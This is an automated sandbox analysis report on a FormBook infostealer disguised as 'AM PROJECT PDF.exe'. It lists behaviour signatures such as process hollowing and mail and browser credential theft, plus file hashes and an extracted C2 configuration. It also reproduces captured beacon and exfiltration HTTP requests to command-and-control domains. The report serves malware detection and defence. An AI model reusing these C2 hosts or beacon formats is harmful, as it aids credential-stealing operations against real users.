Windows Analysis Report
AM PROJECT PDF.exe

Overview

General Information

Sample Name: AM PROJECT PDF.exe
Analysis ID: 708243
MD5: 05069262cd099b2e37afb5afe629d12d
SHA1: 5abfb565897213b0f747fa1843822e4b8b201f7d
SHA256: ba162d7df1cd1beb851a29a69054491959d8ee6ad27f18b3e9dc57a3f6df1122
Tags: exe
Infos:

Detection

FormBook
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Multi AV Scanner detection for submitted file
Yara detected FormBook
Malicious sample detected (through community Yara rule)
Yara detected AntiVM3
System process connects to network (likely due to code injection or exploit)
Sample uses process hollowing technique
Tries to steal Mail credentials (via file / registry access)
Maps a DLL or memory area into another process
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Machine Learning detection for sample
.NET source code contains potential unpacker
Injects a PE file into a foreign processes
Queues an APC in another process (thread injection)
Deletes itself after installation
Modifies the context of a thread in another process (thread injection)
C2 URLs / IPs found in malware configuration
Tries to harvest and steal browser information (history, passwords, etc)
Uses 32bit PE files
Queries the volume information (name, serial number etc) of a device
Yara signature match
May sleep (evasive loops) to hinder dynamic analysis
Uses code obfuscation techniques (call, push, ret)
Internet Provider seen in connection with other malware
Detected potential crypto function
Found potential string decryption / allocating functions
Sample execution stops while process was sleeping (likely an evasion)
Contains functionality to call native functions
HTTP GET or POST without a user agent
Contains functionality for execution timing, often used to detect debuggers
Contains long sleeps (>= 3 min)
Enables debug privileges
Creates a DirectInput object (often for capturing keystrokes)
Sample file is different than original file name gathered from version info
Contains functionality to read the PEB
Uses a known web browser user agent for HTTP communication
Checks if the current process is being debugged
Found large amount of non-executed APIs
Creates a process in suspended mode (likely to inject code)
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)

Classification

AV Detection
barindex
Multi AV Scanner detection for submitted file
Source: AM PROJECT PDF.exe ReversingLabs: Detection: 76%
Source: AM PROJECT PDF.exe Metadefender: Detection: 44% Perma Link
Yara detected FormBook
Source: Yara match File source: 00000012.00000002.520390318.00000000010B0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000012.00000002.519325021.0000000001080000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000006.00000002.423862001.0000000000401000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000012.00000002.517474120.0000000000C20000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000D.00000000.373978746.0000000005917000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000D.00000000.402693120.0000000005917000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
Machine Learning detection for sample
Source: AM PROJECT PDF.exe Joe Sandbox ML: detected
Source: 00000012.00000002.520390318.00000000010B0000.00000004.00000800.00020000.00000000.sdmp Malware Configuration Extractor: FormBook {"C2 list": ["www.texasfirsthonda.com/rdny/"], "decoy": ["YRF12bO2pd49faW4UzTvrJzXWL/bf1MDOw==", "F4vBUcAt7jUgbXBJ", "/I/yHgE4NrnX/69c", "fVXBOjIn1JvtUbyaEA==", "US2MK5jWbG3A6UiTbTaoXA==", "hiSLAGDR+C8gbXBJ", "VPsw1ki7cFOrtbxFyp4GoPQ04vwI8w==", "+WO4/vgbq3qspGz+h2j/s/Y04vwI8w==", "SvNJK4l8SXyunkOOd2LkmhcNuF2IQbU=", "POJGLKrcxvhwrlmIRTLZewmZOaQ=", "w16DIwszB9wRUsGqeM6E2amdwg==", "bOswTj2od6cNSnANu0Mz8MA=", "eDKOBWGpQDGO+RwWemIUujLA3Ase/ZLW", "fglVcE90+x6AttuCZ0k7Jdrn1Q==", "P6/189IYImqYjDKXEOGiHBYZ", "7H3sn/0a9i3AwGr2sEMz8MA=", "uCBh7e4gOIegCrZe", "jwtUfFiKkN5IiE0O67hm2eAA", "MA+EkGiWJBuL+r3tnIVPBKz9t12IQbU=", "ZAhxAV2YsSqhqzpyT0kFfYLEqxEO", "CZcAQhkAubagCrZe", "dmPG8NQG6+s8LPYLom46Jdrn1Q==", "jx9lsKUAuq4RFahZG9iODQwO", "kjeS5tQNHn23+s+ILPw=", "43fYXwgevrWgCrZe", "G7cdOxJMS4e0MktnHgOt", "IpsZlImAquQSUbyaEA==", "vCmC1bvEmaYHBaLnskMz8MA=", "r0qvlf0B2RiCv+KISzzngQmZOaQ=", "AbkH/XVnJl3B+s+ILPw=", "4afkGvTtrrWgCrZe", "qGuk68Xk+UOU2AD5YSCIFtclwF2IQbU=", "QNI2b16JgCtXxN4=", "OeU8e1+tSpP3", "Tt5fziyMU7MjiaAdvEMz8MA=", "7q/nDgx/UpADbNeyLCGtJdrn1Q==", "vJLmHwYJxvFNgDvcZj6tJdrn1Q==", "VLbzJBZVVJKgCrZe", "ZAZl2z2TpP8vWP9lYCKl", "RMEBg3KtSpP3", "UwlMenDrv+JEhrJNIqE95LQLsl2IQbU=", "JPs7u6+Gh7zp1Hp2HNiiHBYZ", "RA9+G5LnpQgxLA==", "CfVRVDJ1Hx9JeSxsjzQpVA==", "XSGIhFqluCeDtdOBjzQpVA==", "41WhkV/leqb9", "bt0kNyuiYWHd4Xrsh0jffgmZOaQ=", "QeEv/GWWqOgWUbyaEA==", "71GKdeDmt+hLgipojzQpVA==", "xlCH91W6ng5JZRxujzQpVA==", "2Wa5Z9MMBT+v2pykSzoUQ/Av4vwI8w==", "i2HMW7v+E0x01vjejzQpVA==", "oBVQ0r+mXFSblzZujzQpVA==", "8boNjgB2S0KYDC8mzrSiHBYZ", "D7MgKRRXTnXL955OEtU43uIqr4wG", "2q8cHZeKXpPtUbyaEA==", "Jqb8LvwA1gd1rmk4EN2iHBYZ", "JK8MteSpUVzq", "gmjgsQ8sPrYwPvzzalNDJdrn1Q==", "DoO/pwsX9Al79SScEeKiHBYZ", "22Xc0Lks7StXxN4=", "5qrsR0SRK3Dk", "RB6DN6YI2+gfT2mCOiDMZpUqr4wG", "q2uwBvgkJFt87ptU"]}
Uses 32bit PE files
Source: AM PROJECT PDF.exe Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
Source: AM PROJECT PDF.exe Static PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
Source: Binary string: wntdll.pdbUGP source: AM PROJECT PDF.exe, 00000006.00000003.298761363.0000000000FA0000.00000004.00000800.00020000.00000000.sdmp, AM PROJECT PDF.exe, 00000006.00000002.425540663.0000000001140000.00000040.00000800.00020000.00000000.sdmp, svchost.exe, 00000012.00000003.428928330.0000000003600000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 00000012.00000002.526559098.0000000003800000.00000040.00000800.00020000.00000000.sdmp, svchost.exe, 00000012.00000002.528369873.000000000391F000.00000040.00000800.00020000.00000000.sdmp, svchost.exe, 00000012.00000003.423937815.0000000003400000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: wntdll.pdb source: AM PROJECT PDF.exe, AM PROJECT PDF.exe, 00000006.00000003.298761363.0000000000FA0000.00000004.00000800.00020000.00000000.sdmp, AM PROJECT PDF.exe, 00000006.00000002.425540663.0000000001140000.00000040.00000800.00020000.00000000.sdmp, svchost.exe, 00000012.00000003.428928330.0000000003600000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 00000012.00000002.526559098.0000000003800000.00000040.00000800.00020000.00000000.sdmp, svchost.exe, 00000012.00000002.528369873.000000000391F000.00000040.00000800.00020000.00000000.sdmp, svchost.exe, 00000012.00000003.423937815.0000000003400000.00000004.00000800.00020000.00000000.sdmp

Networking
barindex
System process connects to network (likely due to code injection or exploit)
Source: C:\Windows\explorer.exe Domain query: www.fellyhub.com
Source: C:\Windows\explorer.exe Domain query: www.soraligne.com
Source: C:\Windows\explorer.exe Network Connect: 162.241.194.111 80 Jump to behavior
Source: C:\Windows\explorer.exe Network Connect: 34.102.136.180 80 Jump to behavior
C2 URLs / IPs found in malware configuration
Source: Malware configuration extractor URLs: www.texasfirsthonda.com/rdny/
Internet Provider seen in connection with other malware
Source: Joe Sandbox View ASN Name: UNIFIEDLAYER-AS-1US UNIFIEDLAYER-AS-1US
HTTP GET or POST without a user agent
Source: global traffic HTTP traffic detected: GET /rdny/?7n-=6lYX&A0G=dZ8Ayr2drPdNVPVmuvzgGnZ5EDtn0CBwsWjIF75G8uy0K/UwgFE8TCCkfo+4feZhoJ7iWr04K24a/vrIrcJXcRwwE/YP1kXGBw== HTTP/1.1Host: www.fellyhub.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic HTTP traffic detected: GET /rdny/?A0G=nirRoMghSnbgIhB91EMNSfP7/7ht0QeVg0GeLwyPWvopBgzqt2G+p533L6eaW6GeyJy3z9ND4nEybKooy0llY69rAo//5MT1xA==&7n-=6lYX HTTP/1.1Host: www.soraligne.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Uses a known web browser user agent for HTTP communication
Source: global traffic HTTP traffic detected: POST /rdny/ HTTP/1.1Host: www.soraligne.comConnection: closeContent-Length: 409Cache-Control: no-cacheOrigin: http://www.soraligne.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://www.soraligne.com/rdny/Accept-Language: en-USAccept-Encoding: gzip, deflateData Raw: 41 30 47 3d 71 67 44 78 72 34 56 56 65 46 62 6a 4e 58 74 58 76 47 59 6d 58 4f 4c 4b 34 50 70 68 70 54 65 41 71 56 4b 46 4b 56 44 78 55 64 5a 77 41 6d 7e 7a 68 57 57 71 77 37 79 4d 52 4c 65 76 62 74 53 66 38 4a 37 46 7a 36 46 5f 38 31 51 38 55 4b 64 42 39 32 73 52 54 6f 31 74 61 59 6d 36 36 65 37 56 77 41 6b 55 58 75 32 6c 76 41 69 53 51 6f 6b 4c 50 42 35 55 5a 67 6e 6c 35 34 70 37 58 36 51 58 4d 63 35 6f 51 33 65 4e 39 45 4e 4f 71 38 69 65 49 44 46 30 6a 35 32 31 4c 63 52 64 6a 38 77 6a 56 56 51 37 30 56 53 76 66 4f 59 5f 4d 65 55 34 31 34 65 42 7e 4e 68 77 6b 42 68 73 46 77 7e 38 4d 36 6d 42 61 61 6b 51 4c 47 33 57 55 68 65 4b 69 4c 70 77 42 4c 78 4d 49 6a 44 6d 79 46 4f 30 79 31 38 47 74 32 58 4a 77 31 66 67 4c 6b 6e 74 61 4c 67 41 41 4c 68 44 63 59 74 4f 61 61 65 57 51 6c 45 71 6a 61 31 53 79 31 52 31 74 6b 54 51 36 53 4c 61 58 71 53 38 38 65 4b 31 73 6b 71 6d 7e 59 4f 4d 74 42 56 66 33 47 47 47 4f 6f 38 57 59 6b 70 61 28 6a 59 72 39 57 4f 79 38 44 39 34 79 48 76 6c 50 58 39 66 34 51 37 75 48 5a 6e 59 65 4a 71 5f 78 6f 59 6e 74 6d 6c 52 35 48 79 61 36 77 46 36 76 79 75 58 34 6c 35 51 48 54 4d 65 30 44 6e 72 57 5f 54 47 6e 30 79 38 44 31 5a 6c 39 76 69 4d 69 43 49 6e 39 55 33 4c 4e 73 54 7a 6d 51 29 2e 00 00 00 00 00 00 00 00 Data Ascii: A0G=qgDxr4VVeFbjNXtXvGYmXOLK4PphpTeAqVKFKVDxUdZwAm~zhWWqw7yMRLevbtSf8J7Fz6F_81Q8UKdB92sRTo1taYm66e7VwAkUXu2lvAiSQokLPB5UZgnl54p7X6QXMc5oQ3eN9ENOq8ieIDF0j521LcRdj8wjVVQ70VSvfOY_MeU414eB~NhwkBhsFw~8M6mBaakQLG3WUheKiLpwBLxMIjDmyFO0y18Gt2XJw1fgLkntaLgAALhDcYtOaaeWQlEqja1Sy1R1tkTQ6SLaXqS88eK1skqm~YOMtBVf3GGGOo8WYkpa(jYr9WOy8D94yHvlPX9f4Q7uHZnYeJq_xoYntmlR5Hya6wF6vyuX4l5QHTMe0DnrW_TGn0y8D1Zl9viMiCIn9U3LNsTzmQ).
Source: global traffic HTTP traffic detected: POST /rdny/ HTTP/1.1Host: www.soraligne.comConnection: closeContent-Length: 185Cache-Control: no-cacheOrigin: http://www.soraligne.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://www.soraligne.com/rdny/Accept-Language: en-USAccept-Encoding: gzip, deflateData Raw: 41 30 47 3d 71 67 44 78 72 34 56 56 65 46 62 6a 4e 67 78 58 73 31 41 6d 44 2d 4c 4b 78 76 70 6a 70 54 65 62 71 56 4b 42 4b 51 75 36 55 50 35 77 44 30 57 7a 69 6b 75 71 78 37 79 4e 5a 72 65 6a 57 4e 54 4c 38 4a 36 71 7a 5f 6c 5f 38 31 30 38 55 4c 42 42 39 48 73 51 53 6f 31 76 4a 59 6e 73 77 2d 37 4d 77 41 35 44 58 71 7e 6c 76 44 4b 53 51 5a 6b 4c 50 7a 52 56 63 41 6e 6b 32 59 70 67 65 61 52 57 4d 63 35 47 51 33 66 6f 39 48 31 4f 71 49 47 65 4a 6c 52 37 36 70 32 74 4b 63 51 69 6c 50 74 4d 65 6c 73 4d 28 54 6a 65 55 59 6c 64 5a 63 5a 77 70 41 29 2e 00 00 00 00 00 00 00 00 Data Ascii: A0G=qgDxr4VVeFbjNgxXs1AmD-LKxvpjpTebqVKBKQu6UP5wD0Wzikuqx7yNZrejWNTL8J6qz_l_8108ULBB9HsQSo1vJYnsw-7MwA5DXq~lvDKSQZkLPzRVcAnk2YpgeaRWMc5GQ3fo9H1OqIGeJlR76p2tKcQilPtMelsM(TjeUYldZcZwpA).
Source: global traffic HTTP traffic detected: POST /rdny/ HTTP/1.1Host: www.soraligne.comConnection: closeContent-Length: 5333Cache-Control: no-cacheOrigin: http://www.soraligne.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://www.soraligne.com/rdny/Accept-Language: en-USAccept-Encoding: gzip, deflateData Raw: 41 30 47 3d 71 67 44 78 72 34 56 56 65 46 62 6a 4d 41 42 58 67 32 59 6d 58 75 4c 4e 39 50 70 6a 6a 7a 65 66 71 56 57 42 4b 56 44 78 55 63 56 77 41 6c 47 7a 68 47 57 71 7a 37 79 4e 62 72 65 76 62 74 53 65 38 4a 75 41 7a 36 42 42 38 33 34 38 56 61 39 42 30 48 73 52 51 49 31 73 49 6f 6d 36 30 2d 37 4d 77 41 31 70 58 76 4b 62 76 43 69 53 51 71 73 4c 50 78 35 55 63 51 6e 6c 70 6f 70 67 65 61 63 57 4d 63 35 38 51 7a 79 33 39 48 56 4f 6c 35 32 65 50 30 52 30 39 35 32 33 4c 63 52 58 75 63 38 43 56 56 73 30 30 51 37 69 66 4e 38 5f 4d 2d 55 34 32 37 32 42 77 74 68 78 35 78 68 78 46 77 6a 6e 4d 36 75 42 61 62 67 6d 4c 31 6e 57 56 42 4f 4b 72 4e 56 33 61 4c 78 4f 48 44 44 31 34 6c 7a 76 79 31 73 43 74 33 66 4a 77 45 72 67 49 7a 37 74 63 70 34 41 64 62 68 50 63 59 74 56 45 71 44 30 51 68 6b 55 6a 59 39 53 79 47 56 31 71 32 4c 51 28 44 4c 61 56 71 53 78 37 65 4b 73 73 6b 71 55 7e 59 4b 4d 74 42 67 71 33 46 69 47 4e 35 73 57 49 6b 70 62 72 54 59 73 6d 57 50 71 34 44 39 73 79 48 62 66 50 57 4e 50 37 67 28 75 47 65 37 59 64 59 71 5f 75 6f 59 69 6f 6d 6c 63 35 48 7e 31 36 78 70 55 76 33 43 58 34 31 52 51 48 51 55 65 7a 51 50 72 66 66 54 48 74 55 7a 76 4d 51 39 71 70 73 57 67 6c 78 55 61 7e 44 79 61 4f 59 4b 76 79 76 79 79 67 36 63 41 43 2d 58 78 52 5a 32 58 6c 51 61 39 7a 35 59 6d 6e 6c 4d 71 77 42 73 50 34 56 37 4e 6b 5f 57 64 73 65 6c 2d 77 5a 71 64 6b 4e 6a 52 6c 34 6f 4a 6d 31 52 34 28 55 55 51 42 58 43 46 39 61 71 65 69 56 43 32 6a 4b 39 64 42 36 4b 2d 44 63 38 6d 72 41 30 53 31 49 71 4e 30 74 43 38 35 52 4d 4f 78 43 6c 71 33 31 37 48 6d 70 39 4b 55 5f 4f 75 42 6f 76 76 6d 48 32 30 6a 6b 58 43 64 4f 4a 73 77 71 59 73 48 73 63 72 36 33 36 39 55 55 73 42 51 6a 56 35 7a 65 58 6b 4d 52 30 37 6c 4c 64 64 6d 47 28 4a 72 74 5a 57 51 31 5a 4f 4c 75 4a 47 50 6b 6a 69 31 53 34 74 55 69 59 72 6c 54 76 57 49 4a 6f 51 36 6b 4f 47 42 76 67 30 54 49 49 53 78 30 71 4d 76 6f 52 42 72 7a 4a 53 68 78 69 48 77 51 7e 57 35 30 6b 6a 42 64 6f 73 43 56 65 63 69 52 30 7a 37 69 48 71 31 51 69 65 4d 74 52 41 30 37 45 72 56 73 53 68 37 35 57 68 32 36 49 47 70 48 28 53 37 53 45 33 56 30 69 65 6e 66 6c 50 4c 56 6b 70 54 6e 39 59 51 50 31 59 66 52 62 4f 47 53 57 48 51 52 56 4b 51 62 49 6d 63 6e 75 30 63 69 4b 38 68 47 34 66 57 6c 44 55 6e 42 64 34 74 59 72 34 57 7a 43 78 5a 72 56 71 6f 4d 51 4d 48 5a 42 76 54 46 55 6a 4d 4c 75 48 36 6d 4a 6a 35 69 71 43 4e 36 54 30 65 44 69 47 36 58 7e 75 71 36 4e 56 52 4b 45 76 73 74 55 6c 38 5a 79 6f 74 56 78 5f 32 43 4e 34 79 62 35 4c 55 46 30 4c 44 52 78 6a 43 49 71 4d 58 32 38 33 51 35 48 57 6c 57 4c 48 32 75 46 4e 47 64 52 4f 4b 6b 47 58 48 50 75 6e 71 7
Source: global traffic HTTP traffic detected: HTTP/1.1 403 ForbiddenServer: openrestyDate: Fri, 23 Sep 2022 06:02:05 GMTContent-Type: text/htmlContent-Length: 291ETag: "6324a85f-123"Via: 1.1 googleConnection: closeData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 20 20 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 20 2f 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 68 6f 72 74 63 75 74 20 69 63 6f 6e 22 20 68 72 65 66 3d 22 64 61 74 61 3a 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 3b 2c 22 20 74 79 70 65 3d 22 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 22 20 2f 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 2f 68 65 61 64 3e 0a 20 20 3c 62 6f 64 79 3e 0a 20 20 20 20 3c 68 31 3e 41 63 63 65 73 73 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 0a 20 20 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE html><html lang="en"> <head> <meta http-equiv="content-type" content="text/html;charset=utf-8" /> <link rel="shortcut icon" href="data:image/x-icon;," type="image/x-icon" /> <title>Forbidden</title> </head> <body> <h1>Access Forbidden</h1> </body></html>
Source: AM PROJECT PDF.exe, 00000000.00000002.312500796.00000000065B2000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://fontfabrik.com
Source: AM PROJECT PDF.exe String found in binary or memory: http://github.com/CJxD/CoreView
Source: svchost.exe, 00000012.00000002.530143936.0000000003E86000.00000004.10000000.00040000.00000000.sdmp, svchost.exe, 00000012.00000002.530717669.0000000006060000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://vlovemeiwonv.cafe24.com/js/jquery-1.12.4.min.js?ver=191202
Source: svchost.exe, 00000012.00000002.530143936.0000000003E86000.00000004.10000000.00040000.00000000.sdmp, svchost.exe, 00000012.00000002.530717669.0000000006060000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://vlovemeiwonv.cafe24.com/js/jquery-migrate-1.4.1.min.js?ver=191202
Source: AM PROJECT PDF.exe, 00000000.00000002.312500796.00000000065B2000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0
Source: AM PROJECT PDF.exe, 00000000.00000002.312500796.00000000065B2000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.carterandcone.coml
Source: svchost.exe, 00000012.00000002.530717669.0000000006060000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.fellyhub.com
Source: svchost.exe, 00000012.00000002.530143936.0000000003E86000.00000004.10000000.00040000.00000000.sdmp, svchost.exe, 00000012.00000002.530717669.0000000006060000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.fellyhub.com/bbs
Source: svchost.exe, 00000012.00000002.530717669.0000000006060000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.fellyhub.com/bbs/board.php?bo_table=photo
Source: svchost.exe, 00000012.00000002.530143936.0000000003E86000.00000004.10000000.00040000.00000000.sdmp, svchost.exe, 00000012.00000002.530717669.0000000006060000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.fellyhub.com/bbs/board.php?bo_table=photo&amp;wr_id=1
Source: svchost.exe, 00000012.00000002.530143936.0000000003E86000.00000004.10000000.00040000.00000000.sdmp, svchost.exe, 00000012.00000002.530717669.0000000006060000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.fellyhub.com/bbs/board.php?bo_table=photo&amp;wr_id=2
Source: svchost.exe, 00000012.00000002.530143936.0000000003E86000.00000004.10000000.00040000.00000000.sdmp, svchost.exe, 00000012.00000002.530717669.0000000006060000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.fellyhub.com/bbs/board.php?bo_table=photo&amp;wr_id=3
Source: svchost.exe, 00000012.00000002.530143936.0000000003E86000.00000004.10000000.00040000.00000000.sdmp, svchost.exe, 00000012.00000002.530717669.0000000006060000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.fellyhub.com/bbs/board.php?bo_table=photo&amp;wr_id=4
Source: svchost.exe, 00000012.00000002.530143936.0000000003E86000.00000004.10000000.00040000.00000000.sdmp, svchost.exe, 00000012.00000002.530717669.0000000006060000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.fellyhub.com/bbs/board.php?bo_table=photo&amp;wr_id=5
Source: svchost.exe, 00000012.00000002.530143936.0000000003E86000.00000004.10000000.00040000.00000000.sdmp, svchost.exe, 00000012.00000002.530717669.0000000006060000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.fellyhub.com/bbs/board.php?bo_table=photo&amp;wr_id=6
Source: svchost.exe, 00000012.00000002.530143936.0000000003E86000.00000004.10000000.00040000.00000000.sdmp, svchost.exe, 00000012.00000002.530717669.0000000006060000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.fellyhub.com/bbs/content.php?co_id=company
Source: svchost.exe, 00000012.00000002.530143936.0000000003E86000.00000004.10000000.00040000.00000000.sdmp, svchost.exe, 00000012.00000002.530717669.0000000006060000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.fellyhub.com/bbs/content.php?co_id=privacy
Source: svchost.exe, 00000012.00000002.530143936.0000000003E86000.00000004.10000000.00040000.00000000.sdmp, svchost.exe, 00000012.00000002.530717669.0000000006060000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.fellyhub.com/bbs/content.php?co_id=provision
Source: svchost.exe, 00000012.00000002.530717669.0000000006060000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.fellyhub.com/bbs/free.php
Source: svchost.exe, 00000012.00000002.530717669.0000000006060000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.fellyhub.com/bbs/gallery.php
Source: svchost.exe, 00000012.00000002.530717669.0000000006060000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.fellyhub.com/bbs/login_check.php
Source: svchost.exe, 00000012.00000002.530717669.0000000006060000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.fellyhub.com/bbs/notice.php
Source: svchost.exe, 00000012.00000002.530717669.0000000006060000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.fellyhub.com/bbs/password_lost.php
Source: svchost.exe, 00000012.00000002.530717669.0000000006060000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.fellyhub.com/bbs/qa.php
Source: svchost.exe, 00000012.00000002.530143936.0000000003E86000.00000004.10000000.00040000.00000000.sdmp, svchost.exe, 00000012.00000002.530717669.0000000006060000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.fellyhub.com/bbs/register.php
Source: svchost.exe, 00000012.00000002.530143936.0000000003E86000.00000004.10000000.00040000.00000000.sdmp, svchost.exe, 00000012.00000002.530717669.0000000006060000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.fellyhub.com/js/common.js?ver=220620
Source: svchost.exe, 00000012.00000002.530143936.0000000003E86000.00000004.10000000.00040000.00000000.sdmp, svchost.exe, 00000012.00000002.530717669.0000000006060000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.fellyhub.com/js/html5.js
Source: svchost.exe, 00000012.00000002.530143936.0000000003E86000.00000004.10000000.00040000.00000000.sdmp, svchost.exe, 00000012.00000002.530717669.0000000006060000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.fellyhub.com/js/jquery-1.12.4.min.js?ver=220620
Source: svchost.exe, 00000012.00000002.530143936.0000000003E86000.00000004.10000000.00040000.00000000.sdmp, svchost.exe, 00000012.00000002.530717669.0000000006060000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.fellyhub.com/js/jquery-migrate-1.4.1.min.js?ver=220620
Source: svchost.exe, 00000012.00000002.530143936.0000000003E86000.00000004.10000000.00040000.00000000.sdmp, svchost.exe, 00000012.00000002.530717669.0000000006060000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.fellyhub.com/js/placeholders.min.js?ver=220620
Source: svchost.exe, 00000012.00000002.530143936.0000000003E86000.00000004.10000000.00040000.00000000.sdmp, svchost.exe, 00000012.00000002.530717669.0000000006060000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.fellyhub.com/js/wrest.js?ver=220620
Source: svchost.exe, 00000012.00000002.530143936.0000000003E86000.00000004.10000000.00040000.00000000.sdmp, svchost.exe, 00000012.00000002.530717669.0000000006060000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.fellyhub.com/plugin/pwa/images/icons/icon-72x72.png
Source: svchost.exe, 00000012.00000002.530143936.0000000003E86000.00000004.10000000.00040000.00000000.sdmp, svchost.exe, 00000012.00000002.530717669.0000000006060000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.fellyhub.com/theme/tailwind0.3
Source: svchost.exe, 00000012.00000002.530143936.0000000003E86000.00000004.10000000.00040000.00000000.sdmp, svchost.exe, 00000012.00000002.530717669.0000000006060000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.fellyhub.com/theme/tailwind0.3/css/balloon.css?ver=220620
Source: svchost.exe, 00000012.00000002.530143936.0000000003E86000.00000004.10000000.00040000.00000000.sdmp, svchost.exe, 00000012.00000002.530717669.0000000006060000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.fellyhub.com/theme/tailwind0.3/css/dark.css?ver=220620
Source: svchost.exe, 00000012.00000002.530143936.0000000003E86000.00000004.10000000.00040000.00000000.sdmp, svchost.exe, 00000012.00000002.530717669.0000000006060000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.fellyhub.com/theme/tailwind0.3/css/tailwind.min.css?ver=220620
Source: svchost.exe, 00000012.00000002.530143936.0000000003E86000.00000004.10000000.00040000.00000000.sdmp, svchost.exe, 00000012.00000002.530717669.0000000006060000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.fellyhub.com/theme/tailwind0.3/img/main_bn.jpg
Source: svchost.exe, 00000012.00000002.530143936.0000000003E86000.00000004.10000000.00040000.00000000.sdmp, svchost.exe, 00000012.00000002.530717669.0000000006060000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.fellyhub.com/theme/tailwind0.3/js/common.js?ver=220620
Source: svchost.exe, 00000012.00000002.530143936.0000000003E86000.00000004.10000000.00040000.00000000.sdmp, svchost.exe, 00000012.00000002.530717669.0000000006060000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.fellyhub.com/theme/tailwind0.3/js/jquery.menu.js?ver=220620
Source: svchost.exe, 00000012.00000002.530143936.0000000003E86000.00000004.10000000.00040000.00000000.sdmp, svchost.exe, 00000012.00000002.530717669.0000000006060000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.fellyhub.com/theme/tailwind0.3/js/sweetalert2.min.js?ver=220620
Source: svchost.exe, 00000012.00000002.530143936.0000000003E86000.00000004.10000000.00040000.00000000.sdmp, svchost.exe, 00000012.00000002.530717669.0000000006060000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.fellyhub.com/theme/tailwind0.3/js/swiper.min.css?ver=220620
